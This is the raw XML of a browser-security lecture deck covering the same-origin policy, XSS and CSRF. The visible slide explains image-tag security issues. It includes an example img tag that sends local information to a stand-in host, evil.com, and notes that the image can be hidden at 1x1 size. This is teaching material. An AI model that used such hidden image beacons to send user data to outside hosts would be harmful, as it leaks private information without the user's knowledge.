            <a:pPr marL="0" lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> &lt;p&gt;  … &lt;/p&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>  …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>=“http://example.com/sunset.gif” height="50" width="100"&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>  …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;/html&gt;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38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tag security issues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7600" y="6616700"/>
            <a:ext cx="355600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68522F2-BA83-4287-A1B3-FDFCCF02D90D}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>99</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44036" name="Content Placeholder 2" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level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Communicate with other sites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&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>=“http://evil.com/pass-local-information.jpg?extra_information”&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200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Hide resulting image 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&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>=“ … ” height=“1" width=“1"&gt; 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Spoof other sites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Add logos that fool a user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl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990600" y="5791200"/>
            <a:ext cx="7315200" cy="40005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Important </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Point: A web page can send information to any site</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="50754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5/18/2007" val="LastModified"/>
</p:tagLst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31567</TotalTime>
  <Words>3316</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>928</Paragraphs>
  <Slides>104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104</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="111" baseType="lpstr">
      <vt:lpstr>Blueprint</vt:lpstr>
      <vt:lpstr>1_Blueprint</vt:lpstr>
      <vt:lpstr>2_Blueprint</vt:lpstr>
      <vt:lpstr>3_Blueprint</vt:lpstr>
      <vt:lpstr>4_Blueprint</vt:lpstr>
      <vt:lpstr>Image</vt:lpstr>
      <vt:lpstr>Acrobat Document</vt:lpstr>
      <vt:lpstr>Browser Security</vt:lpstr>
      <vt:lpstr>Reported Web Vulnerabilities "In the Wild"</vt:lpstr>
      <vt:lpstr>More Recent Data</vt:lpstr>
      <vt:lpstr>Web application vulnerabilities</vt:lpstr>
      <vt:lpstr>Goals of web security</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Web Threat Models</vt:lpstr>
      <vt:lpstr>Malware attacker</vt:lpstr>
      <vt:lpstr>Outline</vt:lpstr>
      <vt:lpstr>Background</vt:lpstr>
      <vt:lpstr>HTTP </vt:lpstr>
      <vt:lpstr>URLs</vt:lpstr>
      <vt:lpstr>HTTP Request</vt:lpstr>
      <vt:lpstr>HTTP Response</vt:lpstr>
      <vt:lpstr>Cookies:   client state</vt:lpstr>
      <vt:lpstr>Cookies</vt:lpstr>
      <vt:lpstr>Cookie authentication</vt:lpstr>
      <vt:lpstr>Rendering Content</vt:lpstr>
      <vt:lpstr>Rendering and events</vt:lpstr>
      <vt:lpstr>Pages can embed content from many sources</vt:lpstr>
      <vt:lpstr>Document Object Model (DOM)</vt:lpstr>
      <vt:lpstr>Isolation</vt:lpstr>
      <vt:lpstr>Running Remote Code is Risky</vt:lpstr>
      <vt:lpstr>Frame and iFrame</vt:lpstr>
      <vt:lpstr>Browser Sandbox</vt:lpstr>
      <vt:lpstr>Analogy</vt:lpstr>
      <vt:lpstr>Policy Goals</vt:lpstr>
      <vt:lpstr>Same Origin Policy</vt:lpstr>
      <vt:lpstr>Communication</vt:lpstr>
      <vt:lpstr>Overview</vt:lpstr>
      <vt:lpstr>Server-client in the same origin</vt:lpstr>
      <vt:lpstr>Client-client in the same origin</vt:lpstr>
      <vt:lpstr>Windows Interact</vt:lpstr>
      <vt:lpstr>Client-client in different origin</vt:lpstr>
      <vt:lpstr>window.postMessage</vt:lpstr>
      <vt:lpstr>postMessage syntax</vt:lpstr>
      <vt:lpstr>Why include “targetOrigin”?</vt:lpstr>
      <vt:lpstr>Domain Relaxation</vt:lpstr>
      <vt:lpstr>Server-client in different origin</vt:lpstr>
      <vt:lpstr>Library import</vt:lpstr>
      <vt:lpstr>CORS</vt:lpstr>
      <vt:lpstr>Cross Site Scripting  (XSS)</vt:lpstr>
      <vt:lpstr>Three top web site vulnerabilites</vt:lpstr>
      <vt:lpstr>Basic scenario: reflected XSS attack</vt:lpstr>
      <vt:lpstr>XSS example: vulnerable site</vt:lpstr>
      <vt:lpstr>Bad input</vt:lpstr>
      <vt:lpstr> </vt:lpstr>
      <vt:lpstr>What is XSS?</vt:lpstr>
      <vt:lpstr>Basic scenario: reflected XSS attack</vt:lpstr>
      <vt:lpstr>            2006 Example Vulnerability</vt:lpstr>
      <vt:lpstr>Adobe PDF viewer “feature”</vt:lpstr>
      <vt:lpstr>Here’s how the attack works:</vt:lpstr>
      <vt:lpstr>And if that doesn’t bother you...</vt:lpstr>
      <vt:lpstr>Reflected XSS attack</vt:lpstr>
      <vt:lpstr>Stored XSS</vt:lpstr>
      <vt:lpstr>MySpace.com   (Samy worm)</vt:lpstr>
      <vt:lpstr>Stored XSS using images</vt:lpstr>
      <vt:lpstr>DOM-based XSS (no server used)</vt:lpstr>
      <vt:lpstr>Cross Site Request Forgery</vt:lpstr>
      <vt:lpstr>Basic picture</vt:lpstr>
      <vt:lpstr>Cross Site Request Forgery  (CSRF)</vt:lpstr>
      <vt:lpstr>Form post with cookie</vt:lpstr>
      <vt:lpstr>Cookieless Example:  Home Router</vt:lpstr>
      <vt:lpstr>Attack on Home Router</vt:lpstr>
      <vt:lpstr>CSRF Defenses</vt:lpstr>
      <vt:lpstr>Secret Token Validation</vt:lpstr>
      <vt:lpstr>Secret Token Validation</vt:lpstr>
      <vt:lpstr>Referer Validation</vt:lpstr>
      <vt:lpstr>Referer Validation Defense</vt:lpstr>
      <vt:lpstr>Referer Privacy Problems</vt:lpstr>
      <vt:lpstr>Suppression over HTTPS is low</vt:lpstr>
      <vt:lpstr>Custom Header Defense</vt:lpstr>
      <vt:lpstr>Broader view of CSRF</vt:lpstr>
      <vt:lpstr>Login CSRF</vt:lpstr>
      <vt:lpstr>Payments Login CSRF</vt:lpstr>
      <vt:lpstr>Payments Login CSRF</vt:lpstr>
      <vt:lpstr>Payments Login CSRF</vt:lpstr>
      <vt:lpstr>Payments Login CSRF</vt:lpstr>
      <vt:lpstr>Login CSRF</vt:lpstr>
      <vt:lpstr>Sites can redirect browser</vt:lpstr>
      <vt:lpstr>Attack on origin/referer header</vt:lpstr>
      <vt:lpstr>CSRF Recommendations</vt:lpstr>
      <vt:lpstr>Navigation</vt:lpstr>
      <vt:lpstr>A Guninski Attack</vt:lpstr>
      <vt:lpstr>What should the policy be?</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Window Policy Anomaly</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Secure Cookies</vt:lpstr>
      <vt:lpstr>httpOnly Cookies</vt:lpstr>
      <vt:lpstr>Frames and frame busting</vt:lpstr>
      <vt:lpstr>Frames</vt:lpstr>
      <vt:lpstr>Frame Busting</vt:lpstr>
      <vt:lpstr>Better Frame Busting</vt:lpstr>
      <vt:lpstr>THE   END</vt:lpstr>
      <vt:lpstr>HTML Image Tags</vt:lpstr>
      <vt:lpstr>Image tag security issues</vt:lpstr>
      <vt:lpstr>JavaScript onError</vt:lpstr>
      <vt:lpstr>JavaScript timing</vt:lpstr>
      <vt:lpstr>Port scanning behind firewall</vt:lpstr>
      <vt:lpstr>Remote scripting</vt:lpstr>
      <vt:lpstr>Cookie Security Policy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Games and the Impossibility of Realizable Ideal Functionality</dc:title>
  <dc:creator>Ante Derek</dc:creator>
  <cp:lastModifiedBy>Yinzhi Cao</cp:lastModifiedBy>
  <cp:revision>6812</cp:revision>
  <cp:lastPrinted>1998-03-10T18:42:22Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">1997-09-07T20:51:32Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2013-01-08T21:32:07Z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C:\Documents\cs242\notes\web-slides</vt:lpwstr>
  </property>
</Properties>
</file>